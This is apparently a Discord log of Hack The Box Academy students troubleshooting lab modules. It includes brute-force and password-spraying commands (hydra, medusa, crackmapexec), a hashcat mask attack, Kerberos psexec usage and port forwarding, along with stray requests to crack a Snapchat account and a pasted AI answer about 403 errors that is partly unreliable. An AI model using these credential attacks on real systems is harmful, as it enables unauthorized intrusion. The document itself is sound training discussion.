#modules

1 messages · Page 343 of 1

junior marten
#

anyone know what is the problem

#

dont getting the flag

cloud urchin
#

you should provide the module/section

#

my guess is that it's the wrong id

timber hatch
#

module Web Attacks / Mass IDOR Enumeration
i see that with burp i can go to the files, because i need to set the uid twice, but i have no idea how to develop a script which does this automated.
now have to do it manually and find the flag...but honestly, was somebody able to develop a script for that?

cloud urchin
#

they provide a bash script in the section

timber hatch
#

yes which does not work

cloud urchin
#

worked for me

timber hatch
#

it tried to use this script and customize it for this section, but no luck

#

really?

cloud urchin
#

yeah of course.. it's a simple bash scripts that iterates through some numbers and curls with the uid parameter

timber hatch
#

i respawn the target....

#

doesnt work for me

cloud urchin
#

my guess would be something with your script then, i believe i just used the provided script

#

i may have done it with burp

safe star
timber hatch
#

no luck also with curl -O
i think theprovided script cannot work. becaus you must set the uid twice as i see with burp

safe star
timber hatch
#

yes

safe star
#

thats what you also need to change

timber hatch
wintry iris
#

Hi all,

I have a question about the first task in the Windows Event Logs module

Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

The question asked an event happened on 8/3/2022 at 10:23:25, but at last, why we need to look at an event that happened after this one? Shouldn't it be an event before 8/3/2022 at 10:23:25?

Finally, students need to look at the event on 8/30/2022 10:23:49 AM:

timber hatch
latent oracle
#

Hi there ,
In active directory enueration and attacks module
In the LLMNR/NBT-NS Poisoning - from Windows section

I keep getting wrong password. eventhough I reset the box several times

cloud urchin
#

sounds like you're using the wrong password

latent oracle
#

I tripple checked several times, and copied and pasted it into the freerdp command. I also tried rdesktop as well

cloud urchin
#

nope if you get wrong password error its the wrong password

#

usually you get a hash not a password

latent oracle
#

check the section please it is a password

cloud urchin
#

i don't need to

#

wrong password error = wrong password

latent oracle
#

I copied and pasted didn't type

cloud urchin
#

you're doing something wrong, wrong password error = wrong password. without more information there's nothing more to it.

latent oracle
#

xfreerdp shows black RDP screen and then disconnects, rdesktop shows wrong password

cloud urchin
#

you're telling me it says wrong password without providing any more context. so it's the wrong password.

latent oracle
#

xfreerdp shows a black RDP screen for a while ( 3 minutes approximatly ) then disconnects. with the following error
[03:44:37:294] [38141:38142] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:44:37:294] [38141:38142] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:44:37:319] [38141:38142] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:44:37:320] [38141:38142] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:46:39:265] [38141:38142] [INFO][com.freerdp.core] - ERRINFO_LOGOFF_BY_USER (0x0000000C):The disconnection was initiated by the user logging off their session on the server.
[03:46:39:265] [38141:38142] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]

rdesktop opens the RDP connection for windows and shows the message wrong password

cloud urchin
#

did you press space bar at the black screen?

#

what's your xfreerdp command

latent oracle
#

ok now it worked after pressing the space bar

#

thank you very much

old oasis
#

Anyone else experiencing a black desktop background when using remmina?

compact jacinth
#

Could anyone give me a hint on Sightless priv escalation. been stuck for days and cant figure it out

wintry iris
#

Working on the following module
Analyzing Evil With Sysmon & Event Logs

After doing process injection and mimikatz password dump I still cannot find any log in Sysmon event logs with ID 7 or 10

full wagon
#

INTERESTING. doing the "easy" LAB in Attacking Common Services. Really started to doubt myself. I mean, it's an easy lab after all. After exhausting all routes I could spot, while enumerated the server, I restarted and did the SMTP part all over again. Didn't find anything. so started reading Discord. Found out that the exact route I was taking should yield a valid username. So, after restarting again, dit the EXACT SAME COMMANDS, and finally I got the hit. So for everyone busting with this, just realize the LAB is not always working as expected. I needed three restarts. Frustrating though, since brute forcing is not the thing that teaches me most. It's just boring to wait for the process and I figure it's not that realistic anyway.

wintry iris
#

CBBH and CPTS modules are good, the CDSA modules suck a lot, Windows is super slow and the solution doesn't work as stated at all

compact jacinth
#

Could anyone give me a hint on Sightless priv escalation. been stuck for days and cant figure it out
I have done, ssh -L 8080:admin.sightless.htb:8080 <user>@sightless.htb
also added 127.0.0.1 to admin.sightless.htb.
I get to the frox*** website login but nothing else

wintry iris
#

can anyone tell me why powershell.exe is not displayed as a managed process?

#

in the screenshot of the module Analyzing Evil With Sysmon & Event Logs, powershell.exe is dispalyed as a managed process

#

The spoolsv.exe is also not displayed as a managed process after the injection, I have confirmed that the injection has succeeded.

rare swan
#

Assessment:Web Fuzzing --> cant find any parameter --> tried both GET/POST
Can someone give me a hint

#

Do I also have to fuzz "key" like -d "FUZZ=FUZZ2" ?

#

If so the list would be extremely extensive with over 3 millions combinations! --> guess that would be the wrong approach

rare swan
#

Got it

#

Filter words was the wrong approach...

rare swan
limber oasis
#

I had a question about the CDSA Module 3 area for Get-WinEvent, I understand -path, i understand Select-Object to get the required fields.

But I don't understand the {$_.Properties[21].Value part of the query.

The answers for all the skills assessment at the end of Module 3, immediately jump to a very specific Windows Event ID, and a very specific Property Field/Line of the query.

I don't get how they immediately know which Event ID and which Line of the Event ID is required to search for to find those specific IOCs

rare swan
# acoustic owl

Is the old content of this module somehow still somewhere available?

acoustic owl
rare swan
#

So I have to redo the whole module again - somehow upsetting

#

All the notes are not valid anymore

#

They have no reference anymore

timber hatch
#

Web Attacks / Bypassing Encoded References
In the section is written:
Luckily for us, this is precisely the case in this web application.

If we take a look at the link in the source code, we see that it is calling a JavaScript function with javascript:downloadContract('1'). Looking at the downloadContract() function in the source code, we see the following:

Code: javascript
function downloadContract(uid) {
$.redirect("/download.php", {
contract: CryptoJS.MD5(btoa(uid)).toString(),
}, "POST", "_self");
}

but when i look at the source code i do not find this, is the lab something else...? or can i follow the example...?

#

and when i use the same bash script as in the section before i get the same flag again...

#

something wrong with the spawning?

fiery berry
timber hatch
#

alright, but i do not find the hashing function...? in the section is written we find a hashing / encoding fucntion

fiery berry
timber hatch
fiery berry
timber hatch
#

this is from the lab yes, can i dm you?

fiery berry
#

sure thing.

inland cove
#

cant access nibbles target ip, anhy help guys?

hexed lintel
inland cove
#

i tried using the pwnbox different vpn but no luck , opened a ticket and will see.. thanks

acoustic owl
rugged turtle
#

Hi guys, I've got a theoretical question about Kerberoasting. This comes first due to the fact that at this point I'm no longer sure I've got what domain-joined means.
How am I supposed to perform this:

  • From a non-domain joined Linux host using valid domain user credentials.
    If the host is not domain joined ?
#

like, is it possible to use a domain user credentials in a non-domain joined host? if yes, shall I simply specify the domain\user in my username and that's it, or are there specific techniques to perform it

dapper moth
rugged turtle
dapper moth
#

That's basically what you are doing I mean

dapper moth
#

some will have -d flags for the domain. Impacket users [domain]/[username]:[password]@[IP or Hostname] format

rugged turtle
#

oh alright, thus you need to rely on impacket

dapper moth
#

Depends on what you want to do

#

If it's Kerberoasting you can use CrackMapExec/Netexec as well

#

doing from a Linux host I mean

rugged turtle
#

the point is, you basically have to impersonate a domain user on that domain from a machine which is outside the domain, practically speaking

#

leveraging different tools, as you suggest

dapper moth
#

Yeah.... kind of that

late moth
#

any recommendations? Tried `sudo neo4j start' and bloodhound still not finding the database

hexed lintel
flat sleet
#

i need to find a hacker IRL

#

i wanted to use darkweb or sth

#

Im doing a cybersec edu and don't understand half of it

glass quail
#

read and study the material

late moth
hexed lintel
wise burrow
#

Hello, is it possible to get the password to a snapchat account using only the name?

late moth
quiet trout
#

just take it for what its worth and move on.

surreal chasm
#

HTB academy showing me,
Has anyone encountered this issue?
Occuring when trying to start instance of pwnbox

surreal chasm
#

its not a vpn

rustic sage
#

For this problem i am running the following command, but getting permission errors... find command cannot be used, but locate works fine

htb-student@nixfund:/etc$ find /etc -type f -name '*.config' -newermt '2020-03-03' -size +25k -size -28k -user root -exec ls -la {} \; 2>\dev\null
-bash: devnull: Permission denied
htb-student@nixfund:/etc$ 

Without error redirection, I am getting file permission errors...

find: ‘/etc/dovecot/private’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
dapper moth
rustic sage
dapper moth
#

Which module and section?

rustic sage
dapper moth
#

In computing, configuration files (commonly known simply as config files) are files used to configure the parameters and initial settings for some computer programs or applications, server processes and operating system settings.
Some applications provide tools to create, modify, and verify the syntax of their configuration files; these sometime...

rustic sage
#

instead of *.config?

dapper moth
fiery berry
rustic sage
#

helada... when i ran the same command but rather looked for *.conf instead of *.config it ran properly... but why the second one provides permission error?

fiery berry
twin dirge
#

How does someone even learn how to hack?

rustic sage
dapper moth
#

Did you get the answer?

fiery berry
high compass
dapper moth
#

About?

#

I mean.... It will be better if it's pertaining the Modules to be asked here since more people might have the same question

high compass
#

I cant figure out how the cryptography is working in general

#

for a problem

glass quail
#

hey I have port that I don't know what it is it is open and it's inside a machine. how can see what its doing

glass quail
wary plover
glass quail
quiet trout
timid mountain
#

anyone else having major infra issues constantly? so sick of resetting machines when they stop responding, which sometimes happens <5m after spawning. Using pwnbox only on spawned academy machines only at this point. is it just me or ??

srsly considering requesting a refund at this point

coral crest
timid mountain
#

I have a ticket in

unborn oriole
quiet trout
weak kindle
#

[SOLVED!!!]
In the kerberoasting attack chapter "Unconstrained delegation - Users" I replicated the attack and got the TGT for the DC01 users but in order to do that what should I do I tried Pass the ticket but no luck!! Any hints?
P.S I can perform dcsync and dump the available hashes.

novel parrot
#

on the skill assesment of Serverside attacks

#

i need to add it to etc/hosts, but even when adding it i cant access it

#

at least i think i need to add it

wild sun
#

hi im currently doing the challenge for shells and payloads and the foothold it has you rdp to is just horrendously slow, is there something i can do to fix this or do i just gotta suffer thru it.

cloud urchin
#

you can try changing vpn regions, also use the tcp vpn not udp

wild sun
#

alrighty thanks im already on tcp but ill try switching regions later. gonna take a break for now

visual umbra
#

im uin skills assessment for Login Brutefroceing, Part1. Using the user and the pass list from the seclist like htb says. It takes loong time with both hydra and medusa, is the user and pass in the files?

#

medusa was doing wrong... or maby im doing medusa wrong, but dont get it.. iv used: medusa -h http://94.237.56.255 -n 35306 -U top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -M http -m GET but medusa did this:

#

whar did i do wrong with medusa?

cloud urchin
#

something with your medusa or lists are wrong

visual umbra
#

ah.. now i see

#

the list was saved like .txt but is .html .. thanx

weak kindle
#

Kerberos Attack - Constrained Delegation with Linux. I'm replicating the attack but when I psexec with the command

export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

I get this error. I've tried the attack both in my VM and the PWNBOX but the error here is the same. I've added the domain name in the /etc/hosts as well. Any hints? I beleive this is related to PSEXEC script!

tender nimbus
#

Hey guys i need help on the attacking comon servics module for the hard lab, i got the creds for rdp to the f**** user but when i tried to connect with sqlcmd to the mssql server with the creds it give me an error any hint?

visual umbra
#

Hello agin. Im in Part 2 off skill assemnet for Bruteforcing Login, i have the user and password for the SSH server, but it says : Permission denied (publickey) what to do? Im sure it is the ssh i need to get into to get the FTP user.. What im doing wrong?

#

nvm my bad aigin was using ssh standard port

surreal chasm
#

Hey, I need some help with the IPMI page under footprinting module

What is the account's cleartext password?
Should I run hashcat against the hash that has been founded?
Because the estimate time for that is 3 days
||hashcat -m 7300 hc_pass.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u --username||

cloud urchin
safe star
surreal chasm
#

nope

surreal chasm
safe star
#

Use hashcat then

surreal chasm
#

in the module they are showing this command hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u which bruteforces all possibilities

#

but it seems overkill

safe star
#

Just use a wordlist

visual umbra
#

Woop Woop:)

pure pelican
#

Hey guys I need some help,I've wanted to learn about hacking for a while now but it's hard to find valid information and I can't afford any programs or schools could anyone please just help me with some basics,I've done some coding but that's about as much as I am capable of at the moment,it's not good either, please can anyone assist me with this if possible,I would really appreciate that🙏

tender nimbus
final maple
#

Can anyone help me on Question 2 of Web Service & API Attacks - Information Disclosure (with a twist of SQLi) without using sqlmap? Thanks!

dense sentinel
safe star
safe star
#

also it looks like the script.js has a weird looking single quote

tender nimbus
# safe star what is the error

its ok but there is one thing i dont understand, on the server they bot dont have the sysadmin role, but john can execute the command on the linked server but not fioan how can i check that?

shrewd depot
#

also you cold do the active machines from the original htb website (they are free), by watching videos, read about the tools they use and try and error alot

hot merlin
#

Anyone have you done "ACTIVE DIRECTORY TRUST ATTACKS" module?

safe robin
#

doing file transfer methods module and got the flag but why use wget http://<ip>/flag.txt

#

how to come to knw that we need to wget i mean we dont have creds for ftp server , nor for ftp , nor we knw smb

safe star
#

what does that have to do with ftp or smb?

safe robin
#

cause its file transfer methods we can download file from ftp but i cant connect with it and in smb there is share directory nor do i knw the name of that directory so how come to we knw that we need to wget?

safe star
#

it doesnt say use ftp or smb in the question

safe robin
#

yeah but accesseing the server from the web give 403

safe star
#

i think its looking for specific user-agents

safe robin
#

i need more logical and solid explation i mean i done the module but still its bugging me

safe star
#

i tried curl with different user agents and it gives me the flag if i change it from mozilla

safe robin
#

why not chatgpt wait

naive sage
#

web root means, the webserver's root dir

safe robin
#

oh now makes sense so its mean i have to download the flag.txt file from the root directory of the webserver

#

thanks alot

safe star
#

why didnt u just ask what wget was bro 😭

safe robin
safe robin
naive sage
safe robin
#

hmmm

safe star
safe robin
#

shoot

#
A 403 Forbidden error typically means that the server understands your request but refuses to fulfill it. Here are some reasons why this might happen:

Directory permissions: The web server might have specific permission settings for certain directories or files, restricting access to browsers but allowing access through command-line tools like wget. The server could be configured to prevent directory listing or accessing files from certain IP ranges or user agents (browsers).

User-agent restrictions: Web servers can be configured to block requests that come from common web browsers. wget uses a different user-agent string by default, which might be allowed by the server. The server might only respond to specific types of requests that wget can send, while blocking standard web browsers.

Access control: The server could have access control rules that are based on the request method or the type of request being made. For example, direct browser access might be blocked for security reasons, but HTTP tools like wget can still retrieve the file.

File-level security: Sometimes, files are protected and can’t be accessed directly via a browser interface (due to lack of proper authentication or authorization). However, command-line tools can bypass these restrictions when they are less strictly enforced.

How wget Helps Overcome This:
When using wget, you are making a direct HTTP request to the web server for the specific file, bypassing the browser's request handling and potential restrictions.
Since the server might be configured to respond to a simple GET request from tools like wget, you're able to access and download the file successfully, even though a browser returns a 403 error.```
naive sage
safe robin
naive sage
#

@safe star thanks to em

safe robin
#

it was bugging me

naive sage
#

😄

safe robin
#

yeah him too @safe star and thanks alooooot to you too you been bearing me for quite a some time

visual umbra
#

opps, my bad agin, wrong path to list

visual umbra
#

dam, this ffuz tool is not good

cloud urchin
#

ffuf is amazing

visual umbra
#

maby just me dont get it.. i was need to use dirbuster to solove the lab, did not get it workging with ffuf

#

why i dont get a list with directorys ? what im doing wrong?

fossil vale
#

Hi! someone can help me with the "windows lateral movement" module skill's assessment?

visual umbra
fossil vale
#

I'm stucked for 2 days and starting to think it's bugged

safe star
visual umbra
safe star
#

Did you restart the machine

#

Worked for me

cloud urchin
#

doesn't look like your target is up

visual umbra
#

it is.. it going fine with dirbuster

#

ah.. w8

#

the target was down.. sorry

#

it was timeout :S

#

now it run as it shuld

#

thanx

ocean night
#

Messages like that removed as spoilers previously @rustic sage, so just following that.

#

Try to ask if anyone can give you a nudge on where you are stuck, but do not include specifics like that publicly.

rustic sage
#

alright!

ocean night
#

Thanks

quiet trout
#

Anyone done the soc path I'm having trouble getting proper output from noriben

safe robin
quiet trout
#

i did google around for the error i was getting not much help

safe robin
#

what is the error

quiet trout
#

let me check, my pwnbox already termianted

full shoal
#

Trying to do one of the early pen test modules where you use nmap to scan and see a version at a port and this is what I get as a result 8080/tcp open http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at.

safe robin
quiet trout
#

mmm good tip

safe robin
quiet trout
#

checking now

full shoal
safe robin
safe star
#

i just scanned and port 8080 didnt even appear

full shoal
safe star
#

just send the nmap command

safe robin
full shoal
#

nmap -sV -p8080 10.129.244.85

safe robin
safe star
full shoal
#

I got the rest of that lesson done, just not that part

safe star
#

is this service enumeration from nmap module?

full shoal
safe robin
safe robin
#

sometimes you need to grab the banner of the service to know its version like ftp,

#

use netcat for that purpose

full shoal
#

okay I will try that

safe robin
safe robin
full shoal
safe star
full shoal
safe star
#

i got the answer with the same command as you

safe robin
full shoal
safe robin
#

in some cases -A flag gives you nothing in that scenario you have to grab the banner of the service if you can connect with that

safe robin
quiet trout
#

just getting rdps

#

rdpd*

safe robin
quiet trout
#

looks like defender and all other security is disabled by default (gpo)

#

trying the demo again

safe robin
quiet trout
safe robin
#

there terminate procmon?

quiet trout
#

The directions say to do it like that, i've tried exiting it manually and just pressing ctrl+c in noriben to let it terminate proc mon itself

#
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\system32> cd C:\tools\Noriben-master\
PS C:\tools\Noriben-master> ls


    Directory: C:\tools\Noriben-master


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/18/2023   1:09 PM                images
d-----         6/18/2023   1:09 PM                Sample
-a----         6/18/2023   1:09 PM          10777 LICENSE
-a----         7/28/2023  12:46 AM          69956 Noriben.py
-a----         6/18/2023   1:09 PM            509 NoribenConfigExample.ini
-a----         6/18/2023   1:09 PM           3475 NoribenRead.py
-a----         6/18/2023   1:09 PM           1786 NoribenSandbox.bat
-a----         6/18/2023   1:09 PM          20046 NoribenSandbox.py
-a----         6/18/2023   1:09 PM           2370 NoribenSandbox.sh
-a----         6/18/2023   1:09 PM            201 postexec.txt
-a----         6/27/2023   4:55 PM        2714008 Procmon64.exe
-a----         6/18/2023   1:09 PM          16189 ProcmonConfiguration.pmc
-a----         6/18/2023   1:09 PM           6129 README.md


PS C:\tools\Noriben-master> python .\Noriben.py

--===[ Noriben v1.8.8
[*] Using filter file: ProcmonConfiguration.PMC
[*] Using procmon EXE: C:\ProgramData\chocolatey\bin\procmon.exe
[*] Procmon session saved to: Noriben_19_Oct_24__18_20_049113.pml
[*] Launching Procmon ...
[*] Procmon is running. Run your executable now.
[*] When runtime is complete, press CTRL+C to stop logging.

[*] Termination of Procmon commencing... please wait
[*] Procmon terminated
[!] Error detected. Could not create CSV file: Noriben_19_Oct_24__18_20_049113.csv
[*] Exiting with error code: 7: Error creating CSV
PS C:\tools\Noriben-master>```
full shoal
full shoal
safe robin
dim wolf
full shoal
#

@safe robin so interesting enough it worked when I used the vm built into the site and not the one I use on my pc

quiet trout
safe robin
dim wolf
#

forgot where the procmon you're supposed to use is

quiet trout
#

this line?

dim wolf
#

yea that one

quiet trout
#

i have a procmon64.exe in the same dir as noriben, its prob that?

dim wolf
#

yep, put the absolute path to that

#

or relative path should also work

quiet trout
#

@dim wolf sorry to be a bother, the next demo is doing the exact same thing, just with procmon itself instead of noriben + proc, im using the procmon64.exe in the noriben folder and set up the filters like the demo shows but no results... blank log capture

dim wolf
#

ah, yea unfortunately i don't remember how i fixed this and i don't have access to my notes atm

quiet trout
#

that screencap has the Success spelt incorrectly i fixed it SUCCESS and re-ran still same thing, no output

#

hrm...

quiet trout
dim wolf
#

hopefully i'll have access

foggy monolith
#

Sorry this reply is 2 weeks late, but I do have some time-saving tricks up my sleeve when it comes to this ― in the form of scripting.

ocean night
#

Honestly don't remember the conversation, but will scroll up

foggy monolith
ocean night
#

Cool 🙂

gleaming sky
#

Hello folks, I am new to HTB, on SIGHTLESS sqlpad page not launching, any one have same issues.

storm elk
rustic sage
#

What is modules chat for?

tranquil lark
storm elk
storm elk
storm elk
eager ledge
#

Hi,

I am doing
Module: Attacking Common Applications
Section: Attacking Thick Client Applications
Section Link: https://academy.hackthebox.com/module/113/section/2139

The process of retrieving the hard-coded credentials feels overwhelming. Too many application specific things. Are there any other resources that I can refer to so that the section becomes a little more digestable?

foggy monolith
# ocean night Cool 🙂

Does a pretty good job of duplicating the experience ― with the added benefit of 60Hz refresh rates over 4K HDMI with Nvidia graphics, something Wayland supports but Xorg does not.

quick pulsar
#

Hello,

I am working on this machine and can't seem to figure out what to do next. I was already able to mount the machine and find credentials for the alex user, but can't figure out what to do next.

From nmap, I've tried to access SMB, winrm and RDP, but with no luck on either.

During enumeration of RPC I've found shares ADMIN$, C$, IPC$,Users and devshare with no ability to access any of them.

I also found users that imply there is SQL on the server, but haven't been able to even identify what port it would be on as usual MySQL and MSSQL ports aren't working and -p- on nmap didn't reveal anything for that either.

I am using pwnbox and have been working on this for a couple of days now. Any advice? I'd prefer less spoilers if possible, but I am open to articles or write ups(for other machines). If the content I need to solve this is within the course then I'd be happy to continue using only that as resource.

Thank you.

#

^^^Medium Footprinting Lab^^^

wicked apex
quick pulsar
#

I tried enum4linux and it showed me the shares, but my credentials for the alex account didn't let me log on

wicked apex
#

Got any other credentials or account? Try password spraying

dim wolf
#

it's the Footprinting module. password spraying is out of scope

dim wolf
#

i don't have any notes for this but i recommend rereading the sections for the services you found

safe star
eager ledge
grand portal
#

┌─[eu-academy-5]─[10.10.14.66]─[htb-ac-1117172@htb-hipmc8lkol]─[~] └──╼ [★]$ smbclient -L //10.129.20.42 Password for [WORKGROUP\htb-ac-1117172]: why is it asking password for my pwnbox? what is it?

compact jacinth
#

Hi, im doing sightless and I have come to the point to get root. I have portforwarded so I see someone logging into the admin panel. But how do I catch the credentals?

cloud urchin
compact jacinth
#

I dont have access to that channel @cloud urchin

cloud urchin
safe star
viral mica
#

I still don't understand Cybervaca's process to this day

#

Reversing is its own topic/field honestly

safe star
#

its asking for the your user password

#

The first thick client part was simple but that second part...

viral mica
grand portal
safe star
#

its not your pwnbox password

#

you might as well put an empty password since you already know your username doesnt exist on the target server

viral mica
#

you're using the wrong account for the smbclient command i think

#

you typically dont use smbclient for yourself.

safe star
#

yeah, only to check if it allows null sessions

rustic sage
#

Hi Guys ! im new to HTB, I'm trying to unlock the module in HTB Academy with the cubes I've, but icouldn't able to unlock it. please guide me through this issue.

rustic sage
#

@old oasis Sure will do that.

ocean night
#

It is the weekend however, so response may be delayed

acoustic owl
rustic sage
#

@acoustic owl It satarted to work after deactivating it. Thanks for the response.👍

visual umbra
#

I like to say thanks @Everyone for being helpful!

#

Some one from Sweden?

eternal vigil
#

hey bud i am on the same question stuck rn it just takes some time and doens't give out nay output, did you find the soln to that ?

eternal vigil
#

could you please direct me in the right direction?

#

idk what am i doing wrong i am not able to retrieve any output from crackmapexec

#

i am using the right resources tho

#

@grand portal

grand portal
#

what command are you using?

eternal vigil
#

crackmapexec winrm 10.129.49.250 -u /home/user/Desktop/username.list -p /home/user/Desktop/password.list

#

and will connect using evil-winrm after this (as of now that aint working if i use the lists)

grand portal
#

do you know if the target is linux or windows?

eternal vigil
#

windows

#

i ran a nmap scan just in case the services are not located on the usual ports

grand portal
eternal vigil
#

yes i am not using pwnbox

#

i am doing it from personal box i am connected to vpn tho

eternal vigil
grand portal
#

how long have you been waiting?

#

for cracking.

eternal vigil
#

like 7-8 seconds per command and it just doesnt give out any output

#

ok it is working on pwnbox

#

but it is very very slow

grand portal
#

yes, that's what password attack module is.

eternal vigil
#

it feels like it might never complete

grand portal
#

slow

grand portal
eternal vigil
#

could it be becasuse of default threads ?

grand portal
#

just wait for a while

grand portal
#

like this

eternal vigil
#

yes i did that but it didnt work

grand portal
#

im trying at my end. let's see.

eternal vigil
#

okk thankyou'

old oasis
grand portal
#

i looked back in my notes, it was written as too easy, nothin to write im a fool if i get stuck on this, lol

eternal vigil
#

lmaooo

grand portal
eternal vigil
#

IT IS EASY just didn;t work on normal machine and too slow w normal command

grand portal
eternal vigil
#

yes it is working but too slow

grand portal
#

bruteforcing takes time.

old oasis
eternal vigil
#

it is running since 5 mins now

grand portal
eternal vigil
grand portal
#

in the module, its usually under 30 minutes, if you are using correct wordlist

old oasis
#

its shouldnt take hours

eternal vigil
#

but i expected it to be faster/simpler in this module sadglas

ocean night
#

Yeah.. it should not take that long. Go back through the section, make sure you are using the correct wordlist.

eternal vigil
#

yes it is the correct list its just idk why it didn't work on my virtual machine

grand portal
eternal vigil
#

even crackmapexec annoyed me alot in installation the git clone wasnt working pip3 wasnt working after 2-3 hours git clone worked somehow but --recursive didnt work so i had to use it with poetry in the venv

eternal vigil
#

found the password thankyou

grand portal
#

yeah? that's good.

eternal vigil
#

so should i just complete this whole module in pwnbox ?

#

nmap module had the same issues

old oasis
grand portal
eternal vigil
eternal vigil
grand portal
eternal vigil
#

i had to install pipx then using pipx install poetry and then install the build

grand portal
#

i got the password too.

#

just cracked it again.

slim otter
#

Hi all, just working through the command injections module. On the bypassing blacklisted commands task we are required to character insert for the cat command which I understand how to do, but the final payload to get the flag requires 2 operators to be bypassed before providing the command payload. Can anyone point me to where it teaches us that we may have to use 2 operators before a command?

slim otter
#

I was trying the exact payload for 30 minutes, minus the second bypassed operator - it seems they left this vital part out?

grand portal
eternal vigil
grand portal
#

here is unwanted advice, before you ask for help. try different wordlists.

eternal vigil
#

okk will do thankyou

opal nexus
#

Does anyone knows good chisel_proxychains connection commands to be able to perform full nmap scan on some machine in the internal network? the commands I use may be able to perform some simple operations on said machine, but not nmap scan (or basically any operation on any service, including brute force)

opal nexus
grand portal
#

oaky

high compass
#

@real delta check dms bro 😭 🙏

real delta
high compass
real delta
# high compass np gang

That's another way of me saying that no I didn't accept your DM and won't accept any from you 😄

wary plover
high compass
#

ok?

normal sand
green minnow
#

Intro to Academy module. "What is an exercise? the docker target does not load at the ip given in firefox or chromium

acoustic owl
#

For a target from a Docker container, you need the IP and the port

#

like 10.10.10.10:1234

green minnow
#

I was putting the full address and the port but I still couldn't get it to load

#

I'm connected to the vpn fine because I'm currently doing another task connected to a virtualised HTB windows machine

acoustic owl
#

for Docker Targets you don‘t need a VPN Connection

green minnow
#

Even in academy? Someone told me in general that you need one. Anyway, I tried it with and without an openvpn

#

On firefox it's a grey page. On Chromium it will say This page isn't working ERR_Empty_Response

old oasis
green minnow
#

Academy module. "What is an exercise? literally the first one that introduces a docker target

#

Right now I'm doing the file transfer module and everything is working fine. I can nmap the target. I can wget from the target. No issues

old oasis
green minnow
#

The only other thing I can think of which sometimes causes random issues like this is my tunnel to a proxy server on my router that is routing all traffic. If so, is there anything I can add to my whitelist?

#

The whitelist of stuff that wont be sent down the tunnel

#

obviously I don't want to add every single ip manually

old oasis
green minnow
#

I was using something similar on THM and I'm just really trying to get away from this method due to how slow it is. Trying to work with burpsuite in a virtualised machine accessed through a browser is horrible.

rare swan
#

Skills Assessment: Login Brute Forcing Part 2:https://academy.hackthebox.com/module/57/section/516
Have to find out the ftp username --> guess I have to use the tool:anarchy to craft ftp usernames
anarchy needs first and last name --> dont have lastname just username****ssh --> what lastname do i have to give anarchy? Maybe wo? --> any hints

old oasis
dawn bloom
#

I'm on the skill assesment of the OS inyection Module and everytime i add a space to the payload (+,%09) the page crashes and it says NOT FOUND and have to reset the target. Is the payload meant to have no spaces? Or is there something wrong on the server side here?

sacred jacinth
#

Module: Pivoting, Tunneling & Portforwarding

Are the payloads generated by msfvenom working for anyone? In the windows host triggering the payload wasn't stable I would get a shell for a second and it would close. For the linux host I get segmentation fault (core dumped).

green minnow
#

Using metepreter?

eternal vigil
visual socket
#

Os inyection

visual umbra
visual umbra
eternal vigil
visual socket
eternal vigil
#

and to get the password for the ssh login you need to brute force on the one given at the end of skill assessment 1

dawn bloom
#

Idk why when adding a space to the payload it crashes

quiet trout
#

if you want, DM me your request/response and i'm happy to take al ook

#

and a link to the assesment, so i can review the info and my notes

#

@dawn bloom ^

dawn bloom
#

Okay

green minnow
#

What decompression software is installed on the boxes?

#

The question wants me to upload a .zip file to a target, ssh in then unzip it

#

But unzip isn't installed and gzip wont decompress a zip

eternal vigil
#

try 7zip

old oasis
green minnow
#

thats what I did in the end lol

#

With the windows example I dunno if I cheated but I just took the contents of the .txt file. And copy pasted it to the RDP of the windows machine. It did say "Use your upload method of choice" kek

old oasis
green minnow
#

The main method I've been "uploading" scripts to compromised targets in other CTFs is just copy pasting the script text to a new file on the target tbh

#

Rather than do any kind of upload or file transfer

quiet trout
#

does which work for wildcards which *zip* ?

dim gale
#

no, if you do that the shell is going to interpret that as looking for files in the local directory matching the pattern zip

#

*zip*

#

try apropos zip maybe if you are looking for a command matching that pattern

#

actually maybe it will work haha nevermind i'll go back to lurking

quiet trout
#

no which *zip* doesnt work (for me, zsh) i think apropos is the ideal solution here

#

i always forget about that one (sorry i dont speak french)

empty trout
#

is there a binary which we can use to transfer files from windows machine to linux exclude ssh bcz ssh-agent is not working i dont now why

rare swan
empty trout
#

?

visual socket
shadow vessel
#

I’m new to this where do I start

compact patrolBOT
wary plover
eternal vigil
#

how long did it take for you ??? its been almost an hour for me still no luck

shadow vessel
#

Thank you guys very much would like some extra help on the side if anyone can volunteer

wary plover
#

Bro what

next bronze
#

Bro what

#

<@&861185840277487616>

shadow vessel
#

My bad

eternal vigil
shadow vessel
#

Sorry about that guys

eternal vigil
#

i believe it should not take this long

#

i dont think it should take this long for the password mutation question as everyone told that it takes approx 30 mins max also i AM using the given resources and also the pwnbox , could anyone please suggest if should wait or if i am doing something wrong ?

acoustic owl
#

ssh is extremely slow. Are there alternatives?

eternal vigil
#

the questions states ssh

#

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

wary plover
#

Yeah but if you have like ftp running on the host you could also brute force ftp

brave scroll
#

Can anyone tell me what error it is?
Module: File Transfer
Topic : Window File Transfer Method

#

Linux:

eternal vigil
brave scroll
trim rain
#

If I cancel my subscription, will I lose my modules I own and VPN connection to the academy?

brave scroll
trim rain
#

thank you.

dapper moth
brave scroll
